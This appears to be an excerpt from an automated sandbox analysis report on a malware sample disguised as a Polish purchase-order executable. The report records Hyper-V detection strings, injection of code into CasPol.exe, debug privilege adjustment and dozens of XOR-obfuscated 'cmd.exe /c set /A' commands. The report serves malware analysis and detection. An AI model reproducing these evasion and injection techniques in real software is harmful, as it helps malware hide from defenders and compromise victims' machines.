Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000002.14152791167.0000000010059000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 00000089.00000002.18029213795.0000000005269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Code function: 1_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

1_2_10001A5D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

1_2_00405050

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Writes to foreign memory regions

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: E00000

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
